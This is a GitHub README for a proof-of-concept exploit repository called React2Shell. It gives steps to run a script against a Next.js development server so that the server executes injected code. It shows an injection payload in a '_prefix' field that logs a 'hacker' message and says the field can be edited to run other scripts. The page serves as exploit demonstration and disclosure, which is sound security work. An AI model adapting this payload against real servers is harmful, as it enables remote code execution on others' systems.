Skip to content

Latest commit

 

History

History
39 lines (27 loc) · 784 Bytes

README.md

File metadata and controls

39 lines (27 loc) · 784 Bytes

This is a Next.js project bootstrapped with create-next-app.

POC Exploit Instructions

To run the exploit demonstration:

  1. Start the development server in dev mode:
npm run dev
  1. Install form-data dependency (if not already installed):
npm install form-data
  1. Run the exploit script:
node script.js
  1. Open the Next terminal to see:
haha, im a hacker
POST / 200 in 98ms
  1. Edit the _prefix in script.js to change the executed script:
    '_prefix':'console.log("haha, i am a hacker")//',

Links

React2Shell

Credits to LachLan for the PoC script.